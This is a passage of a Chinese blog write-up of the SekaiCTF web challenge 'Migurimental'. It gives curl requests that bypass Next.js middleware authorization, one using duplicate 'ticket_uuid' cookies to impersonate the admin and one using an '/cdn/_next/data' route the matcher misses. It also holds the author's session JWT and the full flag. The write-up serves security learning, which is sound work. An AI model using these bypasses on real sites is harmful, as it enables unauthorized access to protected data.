<h2 id="漏洞二：重复-Cookie-解析差异拿到第一段-flag"><a href="#漏洞二：重复-Cookie-解析差异拿到第一段-flag" class="headerlink" title="漏洞二：重复 Cookie 解析差异拿到第一段 flag"></a>漏洞二：重复 Cookie 解析差异拿到第一段 flag</h2><p><code>/backroom</code> ： 这是一个基于 Cookie 的<strong>鉴权与资源分配端点</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">import &#123; readFirstFlagHalf &#125; from <span class="string">&#x27;../lib/flag&#x27;</span></span><br><span class="line">import &#123; findByTicketUuid &#125; from <span class="string">&#x27;../lib/users&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">export</span> async <span class="keyword">function</span> getServerSideProps(&#123; req, res &#125;) &#123;</span><br><span class="line">  const ticketUser = await findByTicketUuid(req.cookies.ticket_uuid || <span class="string">&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (ticketUser?.<span class="built_in">id</span> !== 1) &#123;</span><br><span class="line">    res.statusCode = 403</span><br><span class="line">    <span class="built_in">return</span> &#123;</span><br><span class="line">      props: &#123;</span><br><span class="line">        backstageNote: <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">        denied: <span class="literal">true</span>,</span><br><span class="line">      &#125;,</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">return</span> &#123;</span><br><span class="line">    props: &#123;</span><br><span class="line">      backstageNote: await readFirstFlagHalf(),</span><br><span class="line">      denied: <span class="literal">false</span>,</span><br><span class="line">    &#125;,</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">export</span> default <span class="keyword">function</span> Backroom(&#123; backstageNote, denied &#125;) &#123;</span><br><span class="line">  <span class="keyword">if</span> (denied) &#123;</span><br><span class="line">    <span class="built_in">return</span> &lt;main className=<span class="string">&quot;rejected-background&quot;</span> aria-label=<span class="string">&quot;Rejected&quot;</span> /&gt;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="built_in">return</span> (</span><br><span class="line">    &lt;main className=<span class="string">&quot;accepted-background&quot;</span> aria-label=<span class="string">&quot;Accepted&quot;</span>&gt;</span><br><span class="line">      &lt;div className=<span class="string">&quot;flag-overlay&quot;</span>&gt;&#123;backstageNote&#125;&lt;/div&gt;</span><br><span class="line">    &lt;/main&gt;</span><br><span class="line">  )</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>middleware 读取 cookie 的逻辑：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> middlewareTicket = request.<span class="property">cookies</span>.<span class="title function_">get</span>(<span class="string">&#x27;ticket_uuid&#x27;</span>)?.<span class="property">value</span> || <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="comment">// 1. 从你的 HTTP 请求头中提取名为 ticket_uuid 的 Cookie</span></span><br><span class="line"><span class="keyword">if</span> (!expectedTicket || middlewareTicket !== expectedTicket) &#123; <span class="comment">// 2. 核心比对逻辑</span></span><br><span class="line">  <span class="keyword">return</span> <span class="title function_">deny</span>(request)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在正常的业务逻辑下：</p>
<ul>
<li><code>expectedTicket</code> 来源于你当前登录的 Session（也就是你低权限账号的原始凭证）。</li>
<li><code>middlewareTicket</code> 来源于你的 Cookie。</li>
<li>正常情况下，两者应该是一模一样的。</li>
</ul>
<p>但在你的攻击剧本里，情况变了：</p>
<p>为了在最终的 <code>/backroom</code> 拿到 Flag，你必须把 Cookie 里的 <code>ticket_uuid</code> 替换成<strong>管理员的 UUID</strong>（通过二维码解码拿到的那个）</p>
<p>这时候就会出现致命冲突：</p>
<ul>
<li><code>middlewareTicket</code> &#x3D; <strong>管理员的 UUID</strong></li>
<li><code>expectedTicket</code> &#x3D; <strong>你自己的低权限 UUID</strong></li>
</ul>
<p>显然，<code>middlewareTicket !== expectedTicket</code> 绝对成立！如果你老老实实地去请求 <code>/backroom</code>，这行代码就会毫不留情地触发 <code>deny(request)</code>，把你踢出去。</p>
<h3 id="破局之法：首尾呼应"><a href="#破局之法：首尾呼应" class="headerlink" title="破局之法：首尾呼应"></a>破局之法：首尾呼应</h3><p>既然这行代码一定会拦截你的伪造请求，你要做的就是<strong>不让它执行</strong>。</p>
<p>这也就是为什么我们在上一轮分析中强调，最后访问 <code>/backroom</code> 时，<strong>必须再次使用第一步学到的“路径畸形绕过”技巧</strong>（比如访问 <code>/backroom/..</code> 或者 <code>//backroom</code>）。</p>
<ul>
<li><strong>靠路径绕过</strong>$\rightarrow$ 骗过 <code>matcher</code> 或 <code>pathname</code> 检查，直接跳过这段 Cookie 校验代码。</li>
<li><strong>靠伪造的 Cookie</strong>$\rightarrow$ 骗过最终的服务端渲染逻辑（<code>req.cookies.ticket_uuid</code>），让服务端以为你是管理员。</li>
</ul>
<p>看懂了这行代码，后面就好拿flag了</p>
<p>SSR 读取 cookie 的逻辑：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> ticketUser = <span class="keyword">await</span> <span class="title function_">findByTicketUuid</span>(req.<span class="property">cookies</span>.<span class="property">ticket_uuid</span> || <span class="string">&#x27;&#x27;</span>)</span><br><span class="line"><span class="keyword">if</span> (ticketUser?.<span class="property">id</span> !== <span class="number">1</span>) &#123;</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>这是一段严格的强制访问控制（Mandatory Access Control）<strong>逻辑。系统通过硬编码检查 <strong><code>**id === 1**</code></strong> 来判断权限。在典型的系统架构或 CTF 题设中，</strong><code>**ID: 1**</code>** 通常代表**超级管理员（Superuser &#x2F; Admin）或系统初始化的第一个特权用户。</li>
<li><strong>执行结果</strong>：如果你提供的 UUID 查出来的用户 ID 不是 1，系统将返回 <code>403 Forbidden</code> HTTP 状态码，并渲染“拒绝访问”的 UI</li>
</ul>
<p>这两个 cookie parser 对重复 cookie 的处理不一致：</p>
<ul>
<li>middleware 的 <code>request.cookies.get(&#39;ticket_uuid&#39;)</code> 取后面的值。</li>
<li>SSR 的 <code>req.cookies.ticket_uuid</code> 取前面的值。</li>
</ul>
<p>所以构造两个同名 <code>ticket_uuid</code>：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: session=&lt;SESSION&gt;; ticket<span class="built_in">_</span>uuid=&lt;MIKU<span class="built_in">_</span>TICKET&gt;; ticket<span class="built_in">_</span>uuid=&lt;OWN<span class="built_in">_</span>TICKET&gt;</span><br></pre></td></tr></table></figure>

<p>middleware 看到最后一个普通用户 ticket，通过校验；SSR 看到第一个 miku ticket，返回 flag 前半段。</p>
<p>请求：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -s \</span><br><span class="line">  -H <span class="string">&#x27;Cookie: session=&lt;SESSION&gt;; ticket_uuid=&lt;MIKU_TICKET&gt;; ticket_uuid=&lt;OWN_TICKET&gt;&#x27;</span> \</span><br><span class="line">  <span class="string">&#x27;https://migurimental.chals.sekai.team/backroom&#x27;</span></span><br></pre></td></tr></table></figure>

<p>我的curl</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -s <span class="keyword">\</span></span><br><span class="line"><span class="keyword"></span>  -H &#x27;Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InlhbmciLCJ0aWVyIjoiUkVHVUxBUiIsInRpY2tldFV1aWQiOiIyZTVlMDg5MC1lZGFjLTRkZWMtODFhYy1kYmZjYjQ0N2RlNDEiLCJzdWIiOiIxMTIwIiwiaWF0IjoxNzgyNjQxNTYzfQ.tENiS3<span class="built_in">_</span>nGHwV4o8Zj6h0dli9PP8BTd2Y2lMUiWQn3o8; ticket<span class="built_in">_</span>uuid=0464e4c2-2700-4e36-8401-597482a41ac7; ticket<span class="built_in">_</span>uuid=2e5e0890-edac-4dec-81ac-dbfcb447de41&#x27; <span class="keyword">\</span></span><br><span class="line"><span class="keyword"></span>  &#x27;https://migurimental.chals.sekai.team/backroom&#x27;</span><br></pre></td></tr></table></figure>

<p>得到前半段：</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-09.png"></p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SEKAI&#123;7h3<span class="built_in">_</span>l33k<span class="built_in">_</span>15<span class="built_in">_</span>b4ck<span class="built_in">_</span>7h3<span class="built_in">_</span>cr0wd<span class="built_in">_</span>15<span class="built_in">_</span>ch33r1ng<span class="built_in">_</span>4nd<span class="built_in">_</span>7h3<span class="built_in">_</span></span><br></pre></td></tr></table></figure>



<p>burpsuit</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-10.png"></p>
<p>右下角有前半段flag</p>
<h2 id="漏洞三：assetPrefix-与-middleware-matcher-覆盖不全拿到第二段-flag"><a href="#漏洞三：assetPrefix-与-middleware-matcher-覆盖不全拿到第二段-flag" class="headerlink" title="漏洞三：assetPrefix 与 middleware matcher 覆盖不全拿到第二段 flag"></a>漏洞三：assetPrefix 与 middleware matcher 覆盖不全拿到第二段 flag</h2><p>第二个站点的 middleware：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">export</span> <span class="keyword">function</span> <span class="title function_">middleware</span>(<span class="params">request</span>) &#123;</span><br><span class="line">  <span class="keyword">const</span> remoteAddress = request.<span class="property">headers</span>.<span class="title function_">get</span>(<span class="string">&#x27;x-real-migu&#x27;</span>) || <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (remoteAddress !== <span class="string">&#x27;1.3.3.7&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> url = <span class="keyword">new</span> <span class="title function_">URL</span>(<span class="string">&#x27;/rejected&#x27;</span>, request.<span class="property">url</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">NextResponse</span>.<span class="title function_">redirect</span>(url, <span class="number">302</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="title class_">NextResponse</span>.<span class="title function_">next</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">export</span> <span class="keyword">const</span> config = &#123;</span><br><span class="line">  <span class="attr">matcher</span>: [<span class="string">&#x27;/&#x27;</span>],</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>正常访问 <code>/</code> 会被重定向到 <code>/rejected</code>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -i <span class="string">&#x27;https://migurimental-2.chals.sekai.team/&#x27;</span></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-11.png"></p>
<p>但是 <code>backstage2</code> 配置了：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123;</span><br><span class="line">  <span class="attr">assetPrefix</span>: <span class="string">&#x27;/cdn&#x27;</span>,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Next.js 的 data route 原本是：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/<span class="built_in">_</span>next/data/nRVcVzPJ7U21AcMTs21fY/index.json</span><br></pre></td></tr></table></figure>

<p>加上 assetPrefix 后，可以通过：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/cdn/<span class="built_in">_</span>next/data/nRVcVzPJ7U21AcMTs21fY/index.json</span><br></pre></td></tr></table></figure>

<p>这个路径会渲染首页 SSR 内容，但没有被 <code>matcher: [&#39;/&#39;]</code> 覆盖，从而绕过 middleware。</p>
<p>请求：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s <span class="string">&#x27;https://migurimental-2.chals.sekai.team/cdn/_next/data/nRVcVzPJ7U21AcMTs21fY/index.json&#x27;</span> | grep -o <span class="string">&#x27;c0nc3r7[^&quot;]*&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<p>响应 HTML 中的 <code>__NEXT_DATA__</code> 含有后半段：</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-12.png"></p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c0nc3r7<span class="built_in">_</span>c4n<span class="built_in">_</span>f1n4lly<span class="built_in">_</span>b3g1n<span class="built_in">_</span>m1ku<span class="built_in">_</span>m1ku<span class="built_in">_</span>b34mmmmmmmmmmmm&#125;</span><br></pre></td></tr></table></figure>



<p>burpsuit里面修改成第二个host</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-13.png"></p>
<p>得到第二段flag</p>
<h2 id="拼接-flag"><a href="#拼接-flag" class="headerlink" title="拼接 flag"></a>拼接 flag</h2><p>前半段：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SEKAI&#123;7h3<span class="built_in">_</span>l33k<span class="built_in">_</span>15<span class="built_in">_</span>b4ck<span class="built_in">_</span>7h3<span class="built_in">_</span>cr0wd<span class="built_in">_</span>15<span class="built_in">_</span>ch33r1ng<span class="built_in">_</span>4nd<span class="built_in">_</span>7h3<span class="built_in">_</span></span><br></pre></td></tr></table></figure>

<p>后半段：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">c0nc3r7<span class="built_in">_</span>c4n<span class="built_in">_</span>f1n4lly<span class="built_in">_</span>b3g1n<span class="built_in">_</span>m1ku<span class="built_in">_</span>m1ku<span class="built_in">_</span>b34mmmmmmmmmmmm&#125;</span><br></pre></td></tr></table></figure>

<p>完整 flag：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SEKAI&#123;7h3<span class="built_in">_</span>l33k<span class="built_in">_</span>15<span class="built_in">_</span>b4ck<span class="built_in">_</span>7h3<span class="built_in">_</span>cr0wd<span class="built_in">_</span>15<span class="built_in">_</span>ch33r1ng<span class="built_in">_</span>4nd<span class="built_in">_</span>7h3<span class="built_in">_</span>c0nc3r7<span class="built_in">_</span>c4n<span class="built_in">_</span>f1n4lly<span class="built_in">_</span>b3g1n<span class="built_in">_</span>m1ku<span class="built_in">_</span>m1ku<span class="built_in">_</span>b34mmmmmmmmmmmm&#125;</span><br></pre></td></tr></table></figure>

<h2 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h2><p>本题主要利用了三个 Next.js&#x2F;框架边界差异：</p>
<ol>
<li><code>nxtP</code> &#x2F; <code>nxtI</code> 内部查询参数前缀归一化，导致 middleware 和 SSR 对 <code>id</code> 的理解不一致。</li>
<li>Edge middleware 的 cookie parser 和 Pages Router SSR 的 cookie parser 对重复 cookie 取值顺序不一致。</li>
<li><code>assetPrefix</code> 下的 data route 变体没有被 middleware matcher 正确覆盖，导致第二个站点首页 SSR 可被未授权访问。</li>
</ol>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://apollo5211.github.io/2026/07/02/sekaictf-migurimental/" data-id="cuidFDSb6o_EKvrlWd4mnJK-D" data-title="SekaiCTF-Migurimental" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Migurimental/" rel="tag">Migurimental</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Next-js/" rel="tag">Next.js</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SekaiCTF/" rel="tag">SekaiCTF</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2026/06/20/ciscn-2024-sanic/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">[CISCN 2024]sanic</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/Web/">Web</a></li></ul></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CISCN/" rel="tag">CISCN</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Migurimental/" rel="tag">Migurimental</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Next-js/" rel="tag">Next.js</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Sanic/" rel="tag">Sanic</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SekaiCTF/" rel="tag">SekaiCTF</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CISCN/" style="font-size: 10px;">CISCN</a> <a href="/tags/Migurimental/" style="font-size: 10px;">Migurimental</a> <a href="/tags/Next-js/" style="font-size: 10px;">Next.js</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/Sanic/" style="font-size: 10px;">Sanic</a> <a href="/tags/SekaiCTF/" style="font-size: 10px;">SekaiCTF</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/07/">July 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/06/">June 2026</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/07/02/sekaictf-migurimental/">SekaiCTF-Migurimental</a>
          </li>
        
          <li>
            <a href="/2026/06/20/ciscn-2024-sanic/">[CISCN 2024]sanic</a>
          </li>
        
          <li>
            <a href="/2026/06/20/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>